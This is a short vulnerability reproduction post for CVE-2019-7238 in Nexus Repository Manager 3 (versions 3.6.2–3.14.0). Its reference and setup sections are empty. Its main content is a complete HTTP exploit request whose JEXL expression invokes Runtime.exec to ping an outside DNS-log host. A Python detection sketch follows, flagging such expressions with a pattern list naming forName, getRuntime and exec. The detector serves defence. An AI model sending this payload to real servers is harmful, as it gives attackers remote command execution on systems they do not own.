Nexus Repository Manager 3 RCE CVE-2019-7238 (what does nexus mean)

Reader submission 307 2022-10-09



0x00 Reference links

0x01 Affected versions

Nexus Repository Manager OSS/Pro versions 3.6.2 through 3.14.0

0x02 Setting up the reproduction environment

0x03 Reproducing the vulnerability

POST /service/extdirect HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 2b482005-c1c3-48b6-942f-70e5a5f6d773
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 398
Cookie: pgv_pvi=5464665088; _ga=GA1.1.452998845.1550474860; _gid=GA1.1.653552585.1550474860; NX-ANTI-CSRF-TOKEN=2b482005-c1c3-48b6-942f-70e5a5f6d773; NXSESSIONID=7bd0f929-d72f-407a-bc17-76c2dd98c6cf
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":11}
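A detection sketch for the request above, added here as an example and not part of the original post: it parses an Ext.Direct body sent to /service/extdirect and flags previewAssets calls whose JEXL expression references Java classes or process execution. The function names, the pattern list and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Assumed pattern list: Java reflection / process-execution references that an
# ordinary selector expression (e.g. format == "maven2") has no reason to contain.
SUSPICIOUS = re.compile(
    r"forName|getRuntime|\.exec\s*\(|ProcessBuilder|java\.lang\.", re.IGNORECASE)


def jexl_expressions(body):
    """Yield each JEXL expression passed to coreui_Component.previewAssets."""
    try:
        calls = json.loads(body)
    except (TypeError, ValueError):
        return
    # Ext.Direct accepts a single call object or a batch (list) of them.
    for call in (calls if isinstance(calls, list) else [calls]):
        if not isinstance(call, dict) or not isinstance(call.get("data"), list):
            continue
        if (call.get("action"), call.get("method")) != ("coreui_Component", "previewAssets"):
            continue
        for arg in call["data"]:
            if not isinstance(arg, dict) or not isinstance(arg.get("filter"), list):
                continue
            filters = {str(f.get("property")): f.get("value")
                       for f in arg["filter"] if isinstance(f, dict)}
            if filters.get("type") == "jexl" and isinstance(filters.get("expression"), str):
                yield filters["expression"]


def is_suspicious(path, body):
    """True when a request to /service/extdirect previews a flagged expression."""
    if path.split("?")[0].rstrip("/") != "/service/extdirect":
        return False
    return any(SUSPICIOUS.search(e) for e in jexl_expressions(body))


def sample_body(expression):
    """Constructed Ext.Direct body (not captured traffic) in the page's layout."""
    filt = [{"property": "repositoryName", "value": "*"},
            {"property": "expression", "value": expression},
            {"property": "type", "value": "jexl"}]
    return json.dumps({"action": "coreui_Component", "method": "previewAssets",
                       "data": [{"filter": filt}], "type": "rpc", "tid": 1})


if __name__ == "__main__":
    for expr in ("1.class.forName('java.lang.Runtime')",
                 'format == "maven2" and path =~ "^/org/example/.*"'):
        print(is_suspicious("/service/extdirect", sample_body(expr)), expr)
```

Run it over request bodies captured by a reverse proxy or WAF in front of Nexus; a hit on a version between 3.6.2 and 3.14.0 warrants immediate investigation.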

